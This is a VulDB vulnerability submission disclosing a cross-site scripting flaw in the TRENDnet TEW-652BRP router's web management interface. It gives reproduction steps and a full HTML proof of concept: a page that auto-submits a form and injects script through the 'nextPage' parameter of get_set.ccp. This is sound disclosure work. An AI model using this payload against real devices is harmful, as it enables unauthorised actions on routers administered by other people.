Submit #78681: An XSS on TRENDnet router TEW-652BRPinfo

Title	An XSS on TRENDnet router TEW-652BRP
Description	# XSS on TRENDnet router TEW-652BRP ## Overview * Type: XSS * Supplier: TRENDNet (https://www.trendnet.com/) * Product: TRENDNet TEW-652BRP (Version v3.2R, https://www.trendnet.com/support/support-detail.asp?prod=235_TEW-652BRP) * Firmware download: https://downloads.trendnet.com/tew-652brp_v3.2/firmware/fw_tew-652brp_v3(3.04b01).zip * Affect version: latest version 3.04B01 * Bug URL: http://192.168.10.1/get_set.ccp ## Description An XSS vulnerability exits at a parameter of post request which is triggered after logging in to the web. The device uses a plaintext password to log in web, so it's easy to leak passwords from the HTTP flow. This vulnerability can be exploited easily. ## Reproduce and PoC ### Steps to Reproduce I have put the PoC(HTML code) in the next section. You need to configure the device's web IP address in the URL. Log in to the web management interface in the browser, then open the PoC on a new page, and an alert will pop up. Note: The alert window flashes before going to the next page, so I suggest using burpsuite proxy to slow down the speed. You can also check the response to locate XSS injection. ### Proof of Concept Below is PoC(HTML code), save the code into a file(xss.html). Open it in the browser after logging in to the web target. ``` <!DOCTYPE html> <html> <head> <script> window.onload = function() { document.getElementById("postsubmit").click(); } </script> <meta charset="utf-8"> <title></title> </head> <body> <form method="post" action="http://192.168.10.1/get_set.ccp"> <input id="ccp_act" type="text" name="ccp_act" value="set"/> <input id="ccpSubEvent" type="text" name="ccpSubEvent" value="CCP_SUB_URLFILTER"/> <input id="nextPage" type="text" name="nextPage" value="domain_filter.htm');alert('XSS');//"/> <input id="urlFilterList_ManagedURL_1.1.2.0.0" type="text" name="urlFilterList_ManagedURL_1.1.2.0.0" value="dummy.org"/> <input id="postsubmit" type="submit" value="submit" /> </form> </body> </html> ```
User	leetsun (UID 39457)
Submission	01/27/2023 14:06 (3 years ago)
Moderation	02/02/2023 09:10 (6 days later)
Status	Accepted
VulDB entry	220019 [TRENDnet TEW-652BRP 3.04b01 Web Management Interface get_set.ccp nextPage cross site scripting]
Points	17

◂ Previous Overview Next ▸

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!